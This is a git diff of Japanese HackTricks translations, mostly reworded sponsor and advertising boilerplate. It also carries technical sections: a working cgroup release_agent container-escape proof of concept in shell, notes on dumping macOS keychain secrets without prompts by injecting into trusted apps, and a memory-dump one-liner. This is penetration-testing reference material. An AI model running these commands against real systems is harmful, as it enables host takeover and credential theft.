* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**してください。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -7,20 +7,20 @@
|
|||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
|
||||
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
|
||||
* **ハッキングトリックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンであり、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
|
@ -38,7 +38,7 @@ t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
|
|||
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
|
||||
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
|
||||
```
|
||||
証明コンセプト(PoC)は、`release_agent`ファイルを作成し、その呼び出しをトリガーして、コンテナホストで任意のコマンドを実行する方法を示しています。以下は、関連する手順の概要です:
|
||||
証明のコンセプト(PoC)は、`release_agent`ファイルを作成し、その呼び出しをトリガーして、コンテナホストで任意のコマンドを実行する方法を示しています。以下は、関連する手順の概要です:
|
||||
|
||||
1. **環境の準備:**
|
||||
- `/tmp/cgrp`ディレクトリを作成して、cgroupのマウントポイントとして使用します。
|
||||
|
@ -47,7 +47,7 @@ $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
|
|||
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
|
||||
```
|
||||
2. **子Cgroupの設定:**
|
||||
- マウントされたcgroupディレクトリ内に名前が"x"の子Cgroupが作成されます。
|
||||
- マウントされたCgroupディレクトリ内に名前が"x"の子Cgroupが作成されます。
|
||||
- "x" Cgroupのnotify_on_releaseファイルに1を書き込むことで、"x" Cgroupの通知が有効になります。
|
||||
```shell
|
||||
echo 1 > /tmp/cgrp/x/notify_on_release
|
||||
|
@ -72,15 +72,15 @@ chmod a+x /cmd
|
|||
```shell
|
||||
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||
```
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業や顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -93,7 +93,7 @@ HackTricksをサポートする他の方法:
|
|||
* **HackTricksで企業を宣伝したり、HackTricksをPDFでダウンロードしたり**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**したり、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**したり、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する
|
||||
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
|
||||
|
||||
</details>
|
||||
|
|
|
@ -8,19 +8,19 @@ HackTricksをサポートする他の方法:
|
|||
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見る
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**@carlospolopm**をフォローする
|
||||
- **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする
|
||||
- **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
|
@ -30,30 +30,30 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
## メインキーチェーン
|
||||
|
||||
- **ユーザーキーチェーン**(`~/Library/Keychains/login.keycahin-db`)は、アプリケーションパスワード、インターネットパスワード、ユーザー生成証明書、ネットワークパスワード、ユーザー生成の公開/秘密鍵など、**ユーザー固有の資格情報**を保存するために使用されます。
|
||||
- **システムキーチェーン**(`/Library/Keychains/System.keychain`)は、WiFiパスワード、システムルート証明書、システムの秘密鍵、システムアプリケーションパスワードなど、**システム全体の資格情報**を保存します。
|
||||
- **ユーザーキーチェーン**(`~/Library/Keychains/login.keycahin-db`)は、アプリケーションパスワード、インターネットパスワード、ユーザー生成証明書、ネットワークパスワード、ユーザー生成の公開/秘密鍵などの**ユーザー固有の資格情報**を保存するために使用されます。
|
||||
- **システムキーチェーン**(`/Library/Keychains/System.keychain`)は、WiFiパスワード、システムルート証明書、システムの秘密鍵、システムアプリケーションパスワードなどの**システム全体の資格情報**を保存します。
|
||||
|
||||
### パスワードキーチェーンアクセス
|
||||
|
||||
これらのファイルは、固有の保護を持たないため、**ダウンロード**できますが、**ユーザーの平文パスワードが必要**です。[**Chainbreaker**](https://github.com/n0fate/chainbreaker)のようなツールを使用して復号化できます。
|
||||
これらのファイルは、固有の保護を持たず、**ダウンロード**できますが、**ユーザーの平文パスワードが必要**です。[**Chainbreaker**](https://github.com/n0fate/chainbreaker)のようなツールを使用して復号化できます。
|
||||
|
||||
## キーチェーンエントリの保護
|
||||
|
||||
### ACLs
|
||||
|
||||
キーチェーン内の各エントリは、さまざまなアクションを実行できるユーザーを規定する**アクセス制御リスト(ACLs)**によって管理されます。これには以下が含まれます:
|
||||
キーチェーン内の各エントリは、さまざまなアクションを実行できる人物を規定する**アクセス制御リスト(ACLs)**によって管理されます。これには次のものが含まれます:
|
||||
|
||||
- **ACLAuhtorizationExportClear**:保持者が秘密のクリアテキストを取得できるようにします。
|
||||
- **ACLAuhtorizationExportWrapped**:保持者が他の提供されたパスワードで暗号化されたクリアテキストを取得できるようにします。
|
||||
- **ACLAuhtorizationExportWrapped**:保持者が別の提供されたパスワードで暗号化されたクリアテキストを取得できるようにします。
|
||||
- **ACLAuhtorizationAny**:保持者が任意のアクションを実行できるようにします。
|
||||
|
||||
ACLsには、プロンプトなしでこれらのアクションを実行できる**信頼されたアプリケーションのリスト**が付属しています。これには以下が含まれます:
|
||||
ACLsには、プロンプトなしでこれらのアクションを実行できる**信頼されたアプリケーションのリスト**が付属しています。これには次のものが含まれます:
|
||||
|
||||
- **`Nil`**(認証不要、**誰もが信頼されている**)
|
||||
- 空のリスト(**誰もが信頼されていない**)
|
||||
- 特定の**アプリケーション**の**リスト**。
|
||||
|
||||
また、エントリには**`ACLAuthorizationPartitionID`**が含まれる場合があり、**teamid、apple、cdhash**を識別するために使用されます。
|
||||
また、エントリには**`ACLAuthorizationPartitionID`**というキーが含まれている場合があり、**teamid、apple、cdhash**を識別するために使用されます。
|
||||
|
||||
- **teamid**が指定されている場合、**エントリの値にアクセス**するためには、使用されるアプリケーションが**同じteamid**を持っている必要があります。
|
||||
- **apple**が指定されている場合、アプリは**Appleによって署名**されている必要があります。
|
||||
|
@ -61,13 +61,13 @@ ACLsには、プロンプトなしでこれらのアクションを実行でき
|
|||
|
||||
### キーチェーンエントリの作成
|
||||
|
||||
**`Keychain Access.app`**を使用して**新しいエントリ**を作成する場合、次のルールが適用されます:
|
||||
**`Keychain Access.app`**を使用して**新しい** **エントリ**を作成する場合、次のルールが適用されます:
|
||||
|
||||
- すべてのアプリが暗号化できます。
|
||||
- **アプリは**エクスポート/復号化できません(ユーザーにプロンプトを表示せず)。
|
||||
- すべてのアプリが整合性チェックを見ることができます。
|
||||
- どのアプリもACLを変更できません。
|
||||
- **partitionID**は**`apple`**に設定されます。
|
||||
- **partitionID**は**`apple`**に設定されています。
|
||||
|
||||
**アプリケーションがキーチェーンにエントリを作成**する場合、ルールは若干異なります:
|
||||
|
||||
|
@ -75,7 +75,7 @@ ACLsには、プロンプトなしでこれらのアクションを実行でき
|
|||
- エクスポート/復号化を行うことができるのは**作成アプリケーション**(または明示的に追加された他のアプリ)だけです(ユーザーにプロンプトを表示せず)。
|
||||
- すべてのアプリが整合性チェックを見ることができます。
|
||||
- どのアプリもACLを変更できません。
|
||||
- **partitionID**は**`teamid:[ここにteamID]`**に設定されます。
|
||||
- **partitionID**は**`teamid:[ここにteamID]`**に設定されています。
|
||||
|
||||
## キーチェーンへのアクセス
|
||||
|
||||
|
@ -93,12 +93,12 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
|
|||
### API
|
||||
|
||||
{% hint style="success" %}
|
||||
**キーチェーンの列挙とダンプ**は、[**LockSmith**](https://github.com/its-a-feature/LockSmith)というツールを使用して、**プロンプトを生成しない**シークレットの取得が可能です。
|
||||
**プロンプトを生成しない**シークレットの**キーチェーン列挙とダンプ**は、[**LockSmith**](https://github.com/its-a-feature/LockSmith)ツールを使用して行うことができます。
|
||||
{% endhint %}
|
||||
|
||||
各キーチェーンエントリの**情報**をリスト化および取得します:
|
||||
各キーチェーンエントリの**情報**をリストおよび取得します:
|
||||
|
||||
* API **`SecItemCopyMatching`** は各エントリに関する情報を提供し、使用時に設定できるいくつかの属性があります:
|
||||
* API **`SecItemCopyMatching`** は各エントリに関する情報を提供し、使用する際に設定できるいくつかの属性があります:
|
||||
* **`kSecReturnData`**:trueの場合、データの復号を試みます(ポップアップを回避するためにfalseに設定)
|
||||
* **`kSecReturnRef`**:キーチェーンアイテムへの参照も取得します(後でポップアップなしで復号できることがわかった場合にtrueに設定)
|
||||
* **`kSecReturnAttributes`**:エントリに関するメタデータを取得します
|
||||
|
@ -107,9 +107,9 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
|
|||
|
||||
各エントリの**ACL**を取得します:
|
||||
|
||||
* API **`SecAccessCopyACLList`** を使用すると、キーチェーンアイテムの**ACL**を取得し、ACLのリスト(`ACLAuhtorizationExportClear`などの以前に言及されたもの)が返されます。各リストには以下が含まれます:
|
||||
* API **`SecAccessCopyACLList`** を使用すると、キーチェーンアイテムの**ACL**を取得し、ACLのリスト(`ACLAuhtorizationExportClear`などの以前に言及されたもの)が返されます。各リストには次のものが含まれます:
|
||||
* 説明
|
||||
* **信頼されたアプリケーションリスト**。これには次のようなものが含まれます:
|
||||
* **信頼されたアプリケーションリスト**。これには次のものが含まれる可能性があります:
|
||||
* アプリ:/Applications/Slack.app
|
||||
* バイナリ:/usr/libexec/airportd
|
||||
* グループ:group://AirPort
|
||||
|
@ -119,7 +119,7 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
|
|||
* API **`SecKeychainItemCopyContent`** は平文を取得します
|
||||
* API **`SecItemExport`** はキーと証明書をエクスポートしますが、コンテンツを暗号化してエクスポートするにはパスワードを設定する必要があります
|
||||
|
||||
そして、**プロンプトを生成せずにシークレットをエクスポート**するための**要件**は次のとおりです:
|
||||
そして、**プロンプトなしでシークレットをエクスポート**するための**要件**は次のとおりです:
|
||||
|
||||
* **1つ以上の信頼された**アプリがリストされている場合:
|
||||
* 適切な**認可**が必要(**`Nil`**、またはシークレット情報にアクセスするための認可されたアプリの許可リストの一部である必要があります)
|
||||
|
@ -133,7 +133,7 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
|
|||
{% hint style="danger" %}
|
||||
したがって、**1つのアプリケーションがリストされている**場合、そのアプリケーションに**コードをインジェクトする**必要があります。
|
||||
|
||||
**PartitionID**に**apple**が指定されている場合、**`osascript`**を使用してアクセスできます。つまり、PartitionIDにappleを持つすべてのアプリケーションに信頼されているものです。**`Python`**も使用できます。
|
||||
**PartitionID**に**apple**が指定されている場合、**`osascript`**を使用してアクセスできます。つまり、PartitionIDにappleを含むすべてのアプリケーションを信頼しているものにアクセスできます。**`Python`**も使用できます。
|
||||
{% endhint %}
|
||||
|
||||
### 2つの追加属性
|
||||
|
@ -146,9 +146,9 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
|
|||
|
||||
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンであり、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかを確認するための**無料**機能を提供しています。
|
||||
|
||||
|
@ -164,10 +164,10 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* **HackTricksで企業を宣伝**したり、**PDFでHackTricksをダウンロード**したりするには、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手してください
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローしてください。
|
||||
* 独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローしてください。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -9,16 +9,16 @@ HackTricksをサポートする他の方法:
|
|||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[Telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦で**フォロー**する:[**@carlospolopm**](https://twitter.com/hacktricks_live)。
|
||||
- **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
|
||||
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**する
|
||||
- **HackTricks**(https://github.com/carlospolop/hacktricks)および**HackTricks Cloud**(https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**企業やその顧客が** **スチーラーマルウェア**によって**侵害**されているかどうかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されているかどうかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -32,23 +32,23 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
### スワップファイル
|
||||
|
||||
`/private/var/vm/swapfile0`などのスワップファイルは、**物理メモリがいっぱいのときのキャッシュ**として機能します。物理メモリにもう余裕がない場合、そのデータはスワップファイルに転送され、必要に応じて物理メモリに戻されます。swapfile0、swapfile1などの名前の複数のスワップファイルが存在する可能性があります。
|
||||
`/private/var/vm/swapfile0`などのスワップファイルは、物理メモリがいっぱいのときに**キャッシュとして機能**します。物理メモリにもう余裕がない場合、そのデータはスワップファイルに転送され、必要に応じて物理メモリに戻されます。swapfile0、swapfile1などの名前の複数のスワップファイルが存在する可能性があります。
|
||||
|
||||
### ハイバネーションイメージ
|
||||
|
||||
`/private/var/vm/sleepimage`にあるファイルは、**ハイバネーションモード**中に重要です。OS Xが休止状態に入るとき、**メモリからのデータはこのファイルに保存**されます。コンピューターを起動すると、システムはこのファイルからメモリデータを取得し、ユーザーが前回終了したところから続行できるようにします。
|
||||
|
||||
現代のMacOSシステムでは、セキュリティ上の理由から、このファイルが通常暗号化されているため、回復が難しいことに注意する価値があります。
|
||||
現代のMacOSシステムでは、セキュリティ上の理由からこのファイルが通常暗号化されているため、回復が難しいことに注意してください。
|
||||
|
||||
* sleepimageの暗号化が有効になっているかどうかを確認するには、`sysctl vm.swapusage`コマンドを実行します。これにより、ファイルが暗号化されているかどうかが表示されます。
|
||||
* sleepimageの暗号化が有効かどうかを確認するには、`sysctl vm.swapusage`コマンドを実行します。これにより、ファイルが暗号化されているかどうかが表示されます。
|
||||
|
||||
### メモリプレッシャーログ
|
||||
|
||||
MacOSシステムのもう1つの重要なメモリ関連ファイルは、**メモリプレッシャーログ**です。これらのログは`/var/log`にあり、システムのメモリ使用状況やプレッシャーイベントに関する詳細な情報を含んでいます。これらは、メモリ関連の問題の診断やシステムが時間の経過とともにメモリをどのように管理しているかを理解するのに特に役立ちます。
|
||||
MacOSシステムのもう1つの重要なメモリ関連ファイルは**メモリプレッシャーログ**です。これらのログは`/var/log`にあり、システムのメモリ使用状況やプレッシャーイベントに関する詳細な情報を含んでいます。これらは、メモリ関連の問題の診断やシステムが時間の経過とともにメモリをどのように管理しているかを理解するのに特に役立ちます。
|
||||
|
||||
## osxpmemを使用したメモリーダンプ
|
||||
|
||||
MacOSマシンでメモリをダンプするためには、[**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip)を使用できます。
|
||||
MacOSマシンでメモリをダンプするには、[**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip)を使用できます。
|
||||
|
||||
**注意**: 以下の手順は、Intelアーキテクチャを搭載したMacでのみ機能します。このツールは現在アーカイブされており、最後のリリースは2017年です。以下の手順でダウンロードしたバイナリは、Apple Siliconが2017年には存在しなかったため、Intelチップをターゲットにしています。arm64アーキテクチャ向けにバイナリをコンパイルすることも可能かもしれませんが、自分で試してみる必要があります。
|
||||
```bash
|
||||
|
@ -65,9 +65,9 @@ sudo kextutil "/tmp/MacPmem.kext"
|
|||
#Allow the kext in "Security & Privacy --> General"
|
||||
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||
```
|
||||
**その他のエラー**は、"セキュリティとプライバシー --> 一般"で**kextの読み込みを許可**することで修正できるかもしれません。単に**許可**してください。
|
||||
**その他のエラー** は、"セキュリティとプライバシー --> 一般" で **kextの読み込みを許可** することで修正できるかもしれません。単に **許可** してください。
|
||||
|
||||
また、次の**ワンライナー**を使用してアプリケーションをダウンロードし、kextをロードしてメモリをダンプすることもできます:
|
||||
また、この **oneliner** を使用してアプリケーションをダウンロードし、kextをロードしてメモリをダンプすることもできます:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -76,11 +76,11 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難型マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -90,14 +90,14 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)でゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したり、HackTricksをPDFでダウンロードしたい場合は** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **をチェックしてください!**
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) **をフォローしてください。**
|
||||
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,27 +2,27 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks をサポートする他の方法:
|
||||
|
||||
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェック!
|
||||
